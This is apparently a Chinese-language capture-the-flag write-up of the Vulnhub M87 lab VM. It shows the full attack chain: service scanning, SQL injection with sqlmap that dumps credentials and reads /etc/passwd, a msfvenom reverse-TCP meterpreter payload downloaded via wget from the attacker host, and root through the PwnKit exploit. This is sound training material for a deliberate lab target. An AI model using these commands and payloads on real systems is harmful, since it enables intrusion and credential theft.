Vulnhub之M87靶机详细测试过程(不同提权方法)
M87
识别目标主机IP地址
─(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:64:18:1b 1 60 PCS Systemtechnik GmbH
192.168.56.250 08:00:27:10:66:7a 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.250
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.250 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-09 22:07 EDT
Nmap scan report for bogon (192.168.56.250)
Host is up (0.00021s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: M87 Login Form
|_http-server-header: Apache/2.4.38 (Debian)
9090/tcp open ssl/zeus-admin?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad request
| Content-Type: text/html; charset=utf8
| Transfer-Encoding: chunked
| X-DNS-Prefetch-Control: off
| Referrer-Policy: no-referrer
| X-Content-Type-Options: nosniff
| Cross-Origin-Resource-Policy: same-origin
| <!DOCTYPE html>
| <html>
| <head>
| <title>
| request
| </title>
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <style>
| body {
| margin: 0;
| font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
| font-size: 12px;
| line-height: 1.66666667;
| color: #333333;
| background-color: #f5f5f5;
| border: 0;
| vertical-align: middle;
| font-weight: 300;
|_ margin: 0 0 10p
NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、9090(ssl)
获得Shell
浏览器访问80端口,为用户登录界面,需要输入email和密码。
──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ nikto -h http://192.168.56.250
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.250
+ Target Hostname: 192.168.56.250
+ Target Port: 80
+ Start Time: 2023-04-09 22:14:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 52a, size: 5b295a9e85480, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2023-04-09 22:15:58 (GMT-4) (61 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
nikto工具发现了/admin目录,访问该目录,为用户登录界面,
┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ gobuster dir -u http://192.168.56.250 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.sh,.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.250
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,js,html,sh,txt
[+] Timeout: 10s
===============================================================
2023/04/09 22:19:24 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 1322]
/admin (Status: 301) [Size: 316] [--> http://192.168.56.250/admin/]
/assets (Status: 301) [Size: 317] [--> http://192.168.56.250/assets/]
/LICENSE (Status: 200) [Size: 1073]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1321374 / 1323366 (99.85%)
===============================================================
2023/04/09 22:24:03 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ nikto -h https://192.168.56.250:9090
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.250
+ Target Hostname: 192.168.56.250
+ Target Port: 9090
---------------------------------------------------------------------------
+ SSL Info: Subject: /O=662b442c19a840e482f9f69cde8f316e/CN=M87
Ciphers: TLS_AES_256_GCM_SHA384
Issuer: /O=662b442c19a840e482f9f69cde8f316e/CN=M87
+ Start Time: 2023-04-09 22:20:30 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-dns-prefetch-control' found, with contents: off
+ Uncommon header 'cross-origin-resource-policy' found, with contents: same-origin
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Hostname '192.168.56.250' does not match certificate's names: M87
+ Retrieved access-control-allow-origin header: https://192.168.56.250:9090
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 18 error(s) and 8 item(s) reported on remote host
+ End Time: 2023-04-09 22:28:40 (GMT-4) (490 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
80端口发现了/admin目录,访问该目录,为用户登录界面,经过测试并没有发现有SQL注入漏洞。此时对/admin进一步扫描:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ dirb http://192.168.56.250
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Apr 9 22:53:30 2023
URL_BASE: http://192.168.56.250/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.250/ ----
==> DIRECTORY: http://192.168.56.250/admin/
==> DIRECTORY: http://192.168.56.250/assets/
+ http://192.168.56.250/index.html (CODE:200|SIZE:1322)
+ http://192.168.56.250/LICENSE (CODE:200|SIZE:1073)
+ http://192.168.56.250/server-status (CODE:403|SIZE:279)
---- Entering directory: http://192.168.56.250/admin/ ----
==> DIRECTORY: http://192.168.56.250/admin/backup/
==> DIRECTORY: http://192.168.56.250/admin/css/
==> DIRECTORY: http://192.168.56.250/admin/images/
+ http://192.168.56.250/admin/index.php (CODE:200|SIZE:4393)
==> DIRECTORY: http://192.168.56.250/admin/js/
---- Entering directory: http://192.168.56.250/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.250/admin/backup/ ----
+ http://192.168.56.250/admin/backup/index.php (CODE:200|SIZE:4412)
---- Entering directory: http://192.168.56.250/admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.250/admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.250/admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sun Apr 9 22:53:49 2023
DOWNLOADED: 13836 - FOUND: 5
在/admin目录下发现了/backup,该目录仍然是用户登录界面,并且尝试有无登录绕过,结果失败,对backup进行FUZZING
┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ wfuzz -c -u http://192.168.56.250/admin/backup/?FUZZ=id -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 161
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.250/admin/backup/?FUZZ=id
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000529: 200 87 L 162 W 4459 Ch "id"
000000759: 200 3 L 2 W 19 Ch "file"
发现了两个参数id和file,先看一下id
┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ curl http://192.168.56.250/admin/backup/?id=id
<html>
</html>
jackceobradexpensesjuliamikeadrianjohnadminalex
说明参数id存在。
经过测试file参数并不能有相应的返回。
经过简单测试id参数存在SQL注入漏洞
──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1'
[23:00:42] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 1185 HTTP(s) requests:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 5676 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(5676=5676,1))),0x7176787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 5427 FROM (SELECT(SLEEP(5)))XWSn)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=1 UNION ALL SELECT CONCAT(0x716a6b6a71,0x75784a6770575651456c4d7279414c434a497241437a534b486d475a456b62625974585579426b6f,0x7176787171)-- -
---
[23:00:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:00:57] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.250'
[23:00:57] [WARNING] your sqlmap version is outdated
[*] ending @ 23:00:57 /2023-04-09/
─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' --dbs
available databases [4]:
[*] db
[*] information_schema
[*] mysql
[*] performance_schema
$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' -D db --tables
Database: db
[1 table]
+-------+
| users |
+-------+
─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' -D db -T users --columns
Table: users
[4 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| email | varchar(50) |
| id | int(11) |
| password | varchar(50) |
| username | varchar(50) |
+----------+-------------+
$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' -D db -T users -C email,username,password --dump
+--------------------+----------+-----------------+
| email | username | password |
+--------------------+----------+-----------------+
| jack@localhost | jack | gae5g5a |
| ceo@localhost | ceo | 5t96y4i95y |
| brad@localhost | brad | gae5g5a |
| expenses@localhost | expenses | 5t96y4i95y |
| julia@localhost | julia | fw54vrfwe45 |
| mike@localhost | mike | 4kworw4 |
| adrian@localhost | adrian | fw54vrfwe45 |
| john@localhost | john | 4kworw4 |
| admin@localhost | admin | 15The4Dm1n4L1f3 |
| alex@localhost | alex | dsfsrw4 |
+--------------------+----------+-----------------+
但是这些email, username, 以及password都无法登录80默认页面,admin页面,admin/backup页面。
尝试通过sqlmap得到shell失败
──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' --os-shell
─(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' --file-read /etc/passwd
┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ cat /home/kali/.local/share/sqlmap/output/192.168.56.250/files/_etc_passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
charlotte:x:1000:1000:charlotte,,,:/home/charlotte:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:107:115:MySQL Server,,,:/nonexistent:/bin/false
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
Debian-exim:x:109:116::/var/spool/exim4:/usr/sbin/nologin
cockpit-ws:x:110:117::/nonexisting:/usr/sbin/nologin
cockpit-wsinstance:x:111:118::/nonexisting:/usr/sbin/nologin
通过SQLMAP得到用户charlotte,尝试用该用户登录9090端口(遍历之前得到的密码)
经过尝试,密码为15The4Dm1n4L1f3
成功登陆9090管理后台,管理后台有terminal功能
charlotte@M87:~$ ls -alh
total 32K
drwxr-xr-x 3 charlotte charlotte 4.0K Nov 6 2020 .
drwxr-xr-x 3 root root 4.0K Nov 6 2020 ..
lrwxrwxrwx 1 root root 9 Nov 6 2020 .bash_history -> /dev/null
-rw-r--r-- 1 charlotte charlotte 220 Nov 6 2020 .bash_logout
-rw-r--r-- 1 charlotte charlotte 3.5K Nov 6 2020 .bashrc
drwx------ 3 charlotte charlotte 4.0K Apr 9 23:15 .gnupg
-rw------- 1 charlotte charlotte 33 Nov 6 2020 local.txt
-rw-r--r-- 1 charlotte charlotte 807 Nov 6 2020 .profile
-rw------- 1 charlotte charlotte 49 Nov 6 2020 .Xauthority
charlotte@M87:~$ cat local.txt
29247ebdec52ba0b9a6fd10d68f6b91f
接下里先将shell升级到meterpreter
┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.230 LPORT=5555 -f elf -o escalate.elf
将escalate.elf上传到目标主机/tmp目录下
charlotte@M87:/tmp$ wget http://192.168.56.230:8000/escalate.elf
--2023-04-09 23:19:55-- http://192.168.56.230:8000/escalate.elf
Connecting to 192.168.56.230:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: ‘escalate.elf’
escalate.elf 100%[=================================================================================================>] 207 --.-KB/s in 0s
2023-04-09 23:19:55 (42.5 MB/s) - ‘escalate.elf’ saved [207/207]
charlotte@M87:/tmp$ chmod +x escalate.elf
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.230:5555
在目标主机运行escalate.elf
[*] Started reverse TCP handler on 192.168.56.230:5555
[*] Sending stage (989032 bytes) to 192.168.56.250
[*] Meterpreter session 1 opened (192.168.56.230:5555 -> 192.168.56.250:34932) at 2023-04-09 23:22:06 -0400
meterpreter >
得到了meterpreter会话
然后利用suggest模块定位可以提权的漏洞。
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.56.250 - Collecting local exploits for x86/linux...
[*] 192.168.56.250 - 167 exploit checks are being tried...
[+] 192.168.56.250 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.250 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.
[+] 192.168.56.250 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.250 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 48 / 48
[*] 192.168.56.250 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.
2 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated.
3 exploit/linux/local/pkexec Yes The service is running, but could not be validated.
4 exploit/linux/local/su_login Yes The target appears to be vulnerable.
选择第1个漏洞进行本地提权
msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options
Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):
Name Current Setting Required Description
---- --------------- -------- -----------
PKEXEC_PATH no The path to pkexec binary
SESSION yes The session to run this module on
WRITABLE_DIR /tmp yes A directory where we can write files
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 x86_64
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 6666
LPORT => 6666
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 192.168.56.230:6666
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.kngdnssvny
[+] The target is vulnerable.
[*] Writing '/tmp/.mefpssoat/avrwdjlbd/avrwdjlbd.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.mefpssoat
[*] Sending stage (3020772 bytes) to 192.168.56.250
[+] Deleted /tmp/.mefpssoat/avrwdjlbd/avrwdjlbd.so
[+] Deleted /tmp/.mefpssoat/.qqfoljnxo
[+] Deleted /tmp/.mefpssoat
[*] Meterpreter session 2 opened (192.168.56.230:6666 -> 192.168.56.250:40732) at 2023-04-09 23:26:24 -0400
id
meterpreter >
meterpreter > id
[-] Unknown command: id
meterpreter > shell
Process 11811 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),1000(charlotte)
cd /root
ls -alh
total 28K
drwx------ 4 root root 4.0K Nov 6 2020 .
drwxr-xr-x 18 root root 4.0K Nov 6 2020 ..
lrwxrwxrwx 1 root root 9 Nov 6 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 3 root root 4.0K Nov 6 2020 .gnupg
drwxr-xr-x 3 root root 4.0K Nov 6 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 1.2K Nov 6 2020 proof.txt
cat proof.txt
MMMMMMMM MMMMMMMM 888888888 77777777777777777777
M:::::::M M:::::::M 88:::::::::88 7::::::::::::::::::7
M::::::::M M::::::::M 88:::::::::::::88 7::::::::::::::::::7
M:::::::::M M:::::::::M8::::::88888::::::8777777777777:::::::7
M::::::::::M M::::::::::M8:::::8 8:::::8 7::::::7
M:::::::::::M M:::::::::::M8:::::8 8:::::8 7::::::7
M:::::::M::::M M::::M:::::::M 8:::::88888:::::8 7::::::7
M::::::M M::::M M::::M M::::::M 8:::::::::::::8 7::::::7
M::::::M M::::M::::M M::::::M 8:::::88888:::::8 7::::::7
M::::::M M:::::::M M::::::M8:::::8 8:::::8 7::::::7
M::::::M M:::::M M::::::M8:::::8 8:::::8 7::::::7
M::::::M MMMMM M::::::M8:::::8 8:::::8 7::::::7
M::::::M M::::::M8::::::88888::::::8 7::::::7
M::::::M M::::::M 88:::::::::::::88 7::::::7
M::::::M M::::::M 88:::::::::88 7::::::7
MMMMMMMM MMMMMMMM 888888888 77777777
Congratulations!
You've rooted m87!
21e5e63855f249bcd1b4b093af669b1e
mindsflee
至此成功得到了root shell和root flag
经验教训
-
目录扫描不能只使用一种工具,否则会漏掉重要的二级目录
-
本靶机的关键是识别出/admin/backup/目录后,需要FUZZ出参数?有点烧脑哈
STRIVE FOR PROGRESS,NOT FOR PERFECTION
